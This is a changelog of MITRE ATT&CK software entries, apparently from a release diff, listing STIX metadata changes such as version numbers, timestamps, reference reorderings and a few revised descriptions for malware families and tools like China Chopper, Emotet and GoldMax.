dictionary_item_added
STIX Field: New value
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New value
modified: 2020-06-29 15:59:07.478000+00:00 → 2023-03-22 00:10:02.140000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[S0521] BloodHound

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX Field: Old value → New value
modified: 2022-09-27 18:19:01.118000+00:00 → 2023-02-16 18:51:10.090000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.3 → 1.4

[S0462] CARROTBAT

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: New value
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New value
modified: 2020-06-15 15:13:27.660000+00:00 → 2023-03-22 03:24:06.264000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[S0023] CHOPSTICK

Current version: 2.3

Version changed from: 2.2 → 2.3

Details
values_changed
STIX Field: Old value → New value
modified: 2022-04-14 17:21:52.879000+00:00 → 2023-03-26 17:51:20.403000+00:00
external_references[9]['url']: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf → https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 2.2 → 2.3

[S0631] Chaes

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: New value
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New value
modified: 2021-10-12 21:51:39.986000+00:00 → 2023-03-24 21:17:54.342000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[S0020] China Chopper

Current version: 2.4

Version changed from: 2.3 → 2.4


Old Description
[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)

New Description
[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server.(Citation: Lee 2013) It has been used by several threat groups.(Citation: Dell TG-3390)(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Rapid7 HAFNIUM Mar 2021)

Details
values_changed
STIX Field: Old value → New value
modified: 2022-04-15 15:15:51.199000+00:00 → 2023-04-10 21:53:43.748000+00:00
description: [China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021) → [China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server.(Citation: Lee 2013) It has been used by several threat groups.(Citation: Dell TG-3390)(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Rapid7 HAFNIUM Mar 2021)
external_references[4]['source_name']: FireEye Periscope March 2018 → Rapid7 HAFNIUM Mar 2021
external_references[4]['description']: FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018. → Eoin Miller. (2021, March 23). Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange. Retrieved October 27, 2022.
external_references[4]['url']: https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html → https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/
external_references[5]['source_name']: Lee 2013 → FireEye Periscope March 2018
external_references[5]['description']: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015. → FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
external_references[5]['url']: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html → https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 2.3 → 2.4
iterable_item_added
STIX Field: New value
external_references: {'source_name': 'Lee 2013', 'description': 'Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.', 'url': 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'}

[S0154] Cobalt Strike

Current version: 1.10

Version changed from: 1.9 → 1.10

Details
values_changed
STIX Field: Old value → New value
modified: 2022-10-12 23:24:12.980000+00:00 → 2023-03-07 13:05:11.028000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.9 → 1.10

[S0126] ComRAT

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX Field: Old value → New value
modified: 2022-10-18 21:58:12.936000+00:00 → 2023-03-22 03:30:00.985000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.3 → 1.4

[S0492] CookieMiner

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: New value
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New value
modified: 2020-10-22 01:50:12.660000+00:00 → 2023-03-22 03:33:29.192000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[S0694] DRATzarus

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New value
modified: 2022-04-12 20:41:58.960000+00:00 → 2023-03-17 13:52:45.671000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[S0673] DarkWatchman

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New value
modified: 2022-10-18 23:16:37.724000+00:00 → 2023-03-22 03:34:53.944000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[S0354] Denis

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field: New value
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New value
modified: 2020-06-30 15:06:42.569000+00:00 → 2023-03-22 03:36:59.569000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.1 → 1.2

[S0367] Emotet

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2020-11-24 20:15:54.954000+00:00 | 2023-01-17 22:19:58.856000+00:00
external_references[3]['source_name'] | Trend Micro Banking Malware Jan 2019 | Talos Emotet Jan 2019
external_references[3]['description'] | Salvio, J.. (2014, June 27). New Banking Malware Uses Network Sniffing for Data Theft. Retrieved March 25, 2019. | Brumaghin, E.. (2019, January 15). Emotet re-emerges after the holidays. Retrieved March 25, 2019.
external_references[3]['url'] | https://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/ | https://blog.talosintelligence.com/2019/01/return-of-emotet.html
external_references[4]['source_name'] | Kaspersky Emotet Jan 2019 | CIS Emotet Apr 2017
external_references[4]['description'] | Shulmin, A. . (2015, April 9). The Banking Trojan Emotet: Detailed Analysis. Retrieved March 25, 2019. | CIS. (2017, April 28). Emotet Changes TTPs and Arrives in United States. Retrieved January 17, 2019.
external_references[4]['url'] | https://securelist.com/the-banking-trojan-emotet-detailed-analysis/69560/ | https://www.cisecurity.org/blog/emotet-changes-ttp-and-arrives-in-united-states/
external_references[5]['source_name'] | CIS Emotet Apr 2017 | CIS Emotet Dec 2018
external_references[5]['description'] | CIS. (2017, April 28). Emotet Changes TTPs and Arrives in United States. Retrieved January 17, 2019. | CIS. (2018, December 12). MS-ISAC Security Primer- Emotet. Retrieved March 25, 2019.
external_references[5]['url'] | https://www.cisecurity.org/blog/emotet-changes-ttp-and-arrives-in-united-states/ | https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/
external_references[6]['source_name'] | Malwarebytes Emotet Dec 2017 | Red Canary Emotet Feb 2019
external_references[6]['description'] | Smith, A.. (2017, December 22). Protect your network from Emotet Trojan with Malwarebytes Endpoint Security. Retrieved January 17, 2019. | Donohue, B.. (2019, February 13). https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/. Retrieved March 25, 2019.
external_references[6]['url'] | https://support.malwarebytes.com/docs/DOC-2295 | https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/
external_references[7]['source_name'] | Symantec Emotet Jul 2018 | ESET Emotet Nov 2018
external_references[7]['description'] | Symantec. (2018, July 18). The Evolution of Emotet: From Banking Trojan to Threat Distributor. Retrieved March 25, 2019. | ESET . (2018, November 9). Emotet launches major new spam campaign. Retrieved March 25, 2019.
external_references[7]['url'] | https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor | https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/
external_references[8]['source_name'] | US-CERT Emotet Jul 2018 | Secureworks Emotet Nov 2018
external_references[8]['description'] | US-CERT. (2018, July 20). Alert (TA18-201A) Emotet Malware. Retrieved March 25, 2019. | Mclellan, M.. (2018, November 19). Lazy Passwords Become Rocket Fuel for Emotet SMB Spreader. Retrieved March 25, 2019.
external_references[8]['url'] | https://www.us-cert.gov/ncas/alerts/TA18-201A | https://www.secureworks.com/blog/lazy-passwords-become-rocket-fuel-for-emotet-smb-spreader
external_references[9]['source_name'] | ESET Emotet Nov 2018 | Picus Emotet Dec 2018
external_references[9]['description'] | ESET . (2018, November 9). Emotet launches major new spam campaign. Retrieved March 25, 2019. | Özarslan, S. (2018, December 21). The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc. Retrieved March 25, 2019.
external_references[9]['url'] | https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/ | https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html
external_references[10]['source_name'] | Secureworks Emotet Nov 2018 | Trend Micro Banking Malware Jan 2019
external_references[10]['description'] | Mclellan, M.. (2018, November 19). Lazy Passwords Become Rocket Fuel for Emotet SMB Spreader. Retrieved March 25, 2019. | Salvio, J.. (2014, June 27). New Banking Malware Uses Network Sniffing for Data Theft. Retrieved March 25, 2019.
external_references[10]['url'] | https://www.secureworks.com/blog/lazy-passwords-become-rocket-fuel-for-emotet-smb-spreader | https://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/
external_references[11]['source_name'] | Talos Emotet Jan 2019 | Kaspersky Emotet Jan 2019
external_references[11]['description'] | Brumaghin, E.. (2019, January 15). Emotet re-emerges after the holidays. Retrieved March 25, 2019. | Shulmin, A. . (2015, April 9). The Banking Trojan Emotet: Detailed Analysis. Retrieved March 25, 2019.
external_references[11]['url'] | https://blog.talosintelligence.com/2019/01/return-of-emotet.html | https://securelist.com/the-banking-trojan-emotet-detailed-analysis/69560/
external_references[12]['source_name'] | Trend Micro Emotet Jan 2019 | Malwarebytes Emotet Dec 2017
external_references[12]['description'] | Trend Micro. (2019, January 16). Exploring Emotet's Activities . Retrieved March 25, 2019. | Smith, A.. (2017, December 22). Protect your network from Emotet Trojan with Malwarebytes Endpoint Security. Retrieved January 17, 2019.
external_references[12]['url'] | https://documents.trendmicro.com/assets/white_papers/ExploringEmotetsActivities_Final.pdf | https://support.malwarebytes.com/docs/DOC-2295
external_references[13]['source_name'] | CIS Emotet Dec 2018 | Symantec Emotet Jul 2018
external_references[13]['description'] | CIS. (2018, December 12). MS-ISAC Security Primer- Emotet. Retrieved March 25, 2019. | Symantec. (2018, July 18). The Evolution of Emotet: From Banking Trojan to Threat Distributor. Retrieved March 25, 2019.
external_references[13]['url'] | https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/ | https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor
external_references[14]['source_name'] | Picus Emotet Dec 2018 | Trend Micro Emotet Jan 2019
external_references[14]['description'] | Özarslan, S. (2018, December 21). The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc. Retrieved March 25, 2019. | Trend Micro. (2019, January 16). Exploring Emotet's Activities . Retrieved March 25, 2019.
external_references[14]['url'] | https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html | https://documents.trendmicro.com/assets/white_papers/ExploringEmotetsActivities_Final.pdf
external_references[15]['source_name'] | Red Canary Emotet Feb 2019 | US-CERT Emotet Jul 2018
external_references[15]['description'] | Donohue, B.. (2019, February 13). https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/. Retrieved March 25, 2019. | US-CERT. (2018, July 20). Alert (TA18-201A) Emotet Malware. Retrieved March 25, 2019.
external_references[15]['url'] | https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/ | https://www.us-cert.gov/ncas/alerts/TA18-201A
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.3 | 1.4

[S0363] Empire

Current version: 1.6

Version changed from: 1.5 → 1.6

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-06-03 17:55:43.889000+00:00 | 2023-03-22 03:43:09.336000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.5 | 1.6

[S0343] Exaramel for Windows

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2020-06-17 23:21:44.445000+00:00 | 2023-03-26 18:59:38.457000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.1 | 2.2

[S0277] FruitFly

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2020-03-30 16:42:09.499000+00:00 | 2023-03-22 03:55:46.184000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S0666] Gelsemium

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-05-06 19:37:01.617000+00:00 | 2023-03-26 19:02:24.792000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[S0597] GoldFinder

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
[GoldFinder](https://attack.mitre.org/software/S0597) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://attack.mitre.org/software/S0597) was discovered in early 2021 during an investigation into the SolarWinds cyber intrusion by [APT29](https://attack.mitre.org/groups/G0016).(Citation: MSTIC NOBELIUM Mar 2021)

New Description
[GoldFinder](https://attack.mitre.org/software/S0597) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://attack.mitre.org/software/S0597) was discovered in early 2021 during an investigation into the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) by [APT29](https://attack.mitre.org/groups/G0016).(Citation: MSTIC NOBELIUM Mar 2021)
Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2021-04-24 22:32:23.654000+00:00 | 2023-03-27 19:50:35.143000+00:00
description | [GoldFinder](https://attack.mitre.org/software/S0597) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://attack.mitre.org/software/S0597) was discovered in early 2021 during an investigation into the SolarWinds cyber intrusion by [APT29](https://attack.mitre.org/groups/G0016).(Citation: MSTIC NOBELIUM Mar 2021) | [GoldFinder](https://attack.mitre.org/software/S0597) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://attack.mitre.org/software/S0597) was discovered in early 2021 during an investigation into the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) by [APT29](https://attack.mitre.org/groups/G0016).(Citation: MSTIC NOBELIUM Mar 2021)
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[S0588] GoldMax

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description
[GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://attack.mitre.org/software/S0588) was discovered in early 2021 during the investigation into the SolarWinds intrusion, and has likely been used by [APT29](https://attack.mitre.org/groups/G0016) since at least mid-2019. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike StellarParticle January 2022)

New Description
[GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://attack.mitre.org/software/S0588) was discovered in early 2021 during the investigation into the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), and has likely been used by [APT29](https://attack.mitre.org/groups/G0016) since at least mid-2019. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike StellarParticle January 2022)
Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-15 22:23:36.883000+00:00 | 2023-03-27 19:46:46.532000+00:00
description | [GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://attack.mitre.org/software/S0588) was discovered in early 2021 during the investigation into the SolarWinds intrusion, and has likely been used by [APT29](https://attack.mitre.org/groups/G0016) since at least mid-2019. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike StellarParticle January 2022) | [GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://attack.mitre.org/software/S0588) was discovered in early 2021 during the investigation into the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), and has likely been used by [APT29](https://attack.mitre.org/groups/G0016) since at least mid-2019. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike StellarParticle January 2022)
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.0 | 2.1

[S0531] Grandoreiro

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-19 22:11:10.040000+00:00 | 2023-03-26 19:05:29.235000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[S0376] HOPLIGHT

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2020-03-30 19:47:21.986000+00:00 | 2023-03-28 20:24:33.471000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S1022] IceApple

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-07-25 16:03:40.451000+00:00 | 2023-03-22 04:45:42.926000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[S0357] Impacket

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-09-27 18:20:48.473000+00:00 | 2023-01-23 20:52:37.112000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.3 | 1.4

[S0669] KOCTOPUS

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-07-29 19:46:14.547000+00:00 | 2023-03-22 04:47:58.740000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S0349] LaZagne

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2021-10-15 16:56:52.156000+00:00 | 2023-03-02 20:48:02.590000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.3 | 1.4

[S0451] LoudMiner

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2021-10-12 16:31:13.272000+00:00 | 2023-03-22 04:51:42.922000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.2 | 1.3

[S0409] Machete

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2021-04-12 03:16:03.258000+00:00 | 2023-03-22 04:52:58.843000+00:00
external_references[1]['source_name'] | Machete | Pyark
external_references[1]['description'] | (Citation: Securelist Machete Aug 2014) | (Citation: 360 Machete Sep 2020)
external_references[2]['source_name'] | Pyark | Machete
external_references[2]['description'] | (Citation: 360 Machete Sep 2020) | (Citation: Securelist Machete Aug 2014)
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.0 | 2.1

[S0002] Mimikatz

Current version: 1.7

Version changed from: 1.6 → 1.7

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-08-03 15:07:11.534000+00:00 | 2023-03-07 13:04:10.731000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.6 | 1.7

[S0256] Mosquito

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2020-03-30 17:06:45.586000+00:00 | 2023-03-26 19:19:33.603000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S0198] NETWIRE

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2021-10-12 11:21:09.567000+00:00 | 2023-03-26 19:24:00.073000+00:00
external_references[2]['source_name'] | FireEye APT33 Sept 2017 | FireEye APT33 Webinar Sept 2017
external_references[2]['description'] | O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018. | Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.
external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html | https://www.brighttalk.com/webcast/10703/275683
external_references[4]['source_name'] | FireEye APT33 Webinar Sept 2017 | FireEye APT33 Sept 2017
external_references[4]['description'] | Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018. | O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.
external_references[4]['url'] | https://www.brighttalk.com/webcast/10703/275683 | https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.4 | 1.5

[S0039] Net

Current version: 2.4

Version changed from: 2.3 → 2.4

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2021-10-15 20:33:54.392000+00:00 | 2023-03-03 16:49:41.059000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.3 | 2.4

[S0457] Netwalker

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2020-06-16 16:14:19.924000+00:00 | 2023-03-22 05:03:29.436000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[S0223] POWERSTATS

Current version: 2.3

Version changed from: 2.2 → 2.3

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-12 19:06:51.405000+00:00 | 2023-03-22 05:13:46.664000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.2 | 2.3

[S0517] Pillowmint

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-07-29 19:50:27.063000+00:00 | 2023-03-26 19:34:38.763000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S0097] Ping

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-13 18:56:52.195000+00:00 | 2023-01-04 21:59:04.229000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.2 | 1.3

[S0501] PipeMon

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2020-10-16 21:01:16.880000+00:00 | 2023-03-26 19:38:46.705000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[S0013] PlugX

Current version: 3.1

Version changed from: 3.0 → 3.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-15 16:30:28.192000+00:00 | 2023-04-10 17:14:55.086000+00:00
external_references[11]['url'] | http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf | https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 3.0 | 3.1

[S0428] PoetRAT

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-19 01:41:29.396000+00:00 | 2023-03-22 05:09:38.370000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.1 | 2.2

[S0518] PolyglotDuke

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2020-10-09 16:07:59.493000+00:00 | 2023-03-26 19:42:34.359000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[S1012] PowerLess

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_aliases | | ['PowerLess']
values_changed
STIX Field | Old value | New Value
modified | 2022-06-02 19:48:39.830000+00:00 | 2023-03-28 17:21:55.473000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[S0685] PowerPunch

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-15 12:11:41.617000+00:00 | 2023-03-22 05:12:04.169000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[S0194] PowerSploit

Current version: 1.6

Version changed from: 1.5 → 1.6

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-09-27 18:18:15.392000+00:00 | 2023-03-22 05:12:48.213000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.5 | 1.6

[S0029] PsExec

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX Field | Old value | New Value
